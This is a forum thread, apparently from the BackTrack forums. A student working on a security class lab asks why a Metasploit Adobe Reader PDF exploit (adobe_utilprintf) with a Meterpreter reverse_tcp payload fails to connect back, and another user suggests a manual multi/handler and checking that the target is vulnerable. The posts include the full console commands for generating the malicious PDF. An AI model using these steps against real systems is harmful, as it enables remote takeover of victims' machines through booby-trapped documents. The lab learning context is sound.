Issues with Client Side Attack: PDF exploit

[StormXt]

Hello! I'm obviously very new to the backtrack forums, well posting here that is, and Ive been using the resources here for about a week already to do a project for my security class. I was doing pretty well until I just hit a wall for like 2 days straight trying to figure out how the PDF fileformat exploit with reverse_tcp payload works. I've been following the Metasploit Unleashed course, which is a great resource, but the problem is I just cant get what there putting in the examples to actually work.

I have research also different sources online, but still found no definite answer.

heres what I've been doing:

Code:

msf > use exploit/windows/fileformat/adobe_utilprintf
msf exploit(adobe_utilprintf) > set FILENAME
FILENAME => support again.pdfdsada
msf exploit(adobe_utilprintf) > set FILENAME support.pdf
FILENAME => support.pdf
msf exploit(adobe_utilprintf) > show options

Module options:

   Name        Current Setting                      Required  Description
   ----        ---------------                      --------  -----------
   FILENAME    support.pdf                          yes       The file name.
   OUTPUTPATH  /opt/metasploit3/msf3/data/exploits  yes       The location of the file.


Exploit target:

   Id  Name
   --  ----
   0   Adobe Reader v8.1.2 (Windows XP SP3 English)


msf exploit(adobe_utilprintf) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(adobe_utilprintf) > set LHOST 192.168.1.19
LHOST => 192.168.1.19
msf exploit(adobe_utilprintf) > show options

Module options:

   Name        Current Setting                      Required  Description
   ----        ---------------                      --------  -----------
   FILENAME    support.pdf                          yes       The file name.
   OUTPUTPATH  /opt/metasploit3/msf3/data/exploits  yes       The location of the file.


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, none, process
   LHOST     192.168.1.19     yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Adobe Reader v8.1.2 (Windows XP SP3 English)


msf exploit(adobe_utilprintf) > exploit
[*] Creating 'support.pdf' file...[*] Generated output file /opt/metasploit3/msf3/data/exploits/support.pdf[*] Exploit completed, but no session was created.

Now when I took a second look the only difference I saw in the code was when the exploit activated it did not set up the handler correctly. In the example it fully stated this:

Code:

msf exploit(adobe_utilprintf) > exploit
[*] Handler binding to LHOST 0.0.0.0[*] Started reverse handler[*] Creating 'BestComputers-UpgradeInstructions.pdf' file...[*] Generated output file /pentest/exploits/framework3/data/exploits/BestComputers-UpgradeInstructions.pdf[*] Exploit completed, but no session was created.

Again I'm just stumped on this whole problem. It might be a simple fix that I am overlooking, and If it is I apologize for posting but I really would like to know what I'm doing wrong. Also I've been trying to do this between two different computers on the same network but still when I activate the pdf file (even using adobe reader 8) it will not try to connect to the listening host.

Again I would really appreciate if someone could guide me through this problem, and I thank everyone in advance who responds

[lupin]

Metasploit may not be starting the Meterpreter handler - in my experience it often does not do this for fileformat style exploits. Use the jobs command to check if the handler is started or not.

If the handler is not started, just start it manually - use the "multi/handler" module and set the payload + options in the same way as you did above. Then when you transfer the PDF you generated (/opt/metasploit3/msf3/data/exploits/support.pdf) to your victim system and open it, the reverse Meterpreter shell should connect back to your configured handler.

[StormXt]

Metasploit may not be starting the Meterpreter handler - in my experience it often does not do this for fileformat style exploits. Use the jobs command to check if the handler is started or not.

If the handler is not started, just start it manually - use the "multi/handler" module and set the payload + options in the same way as you did above. Then when you transfer the PDF you generated (/opt/metasploit3/msf3/data/exploits/support.pdf) to your victim system and open it, the reverse Meterpreter shell should connect back to your configured handler.

thank you for the response Lupin . I forgot to mention that I did set up the handler manually with the LHOST and LPORT the same was it was set in the pdf. But when i ran it on the system it didnt connect back at all. This is where the real situation is.

Again when I create the actual pdf file using the utilprintf exploit the handler does not bind with the LHOST nor does it set up the reverse handler, unlike every tutorial and video has shown me. Could there be perhaps another reason why this could happen? Thanks in advance for answers!

[lupin]

Is your target systems version of Acrobat reader vulnerable to that exploit? Try with a Windows exec payload that runs calc.exe if you're not sure.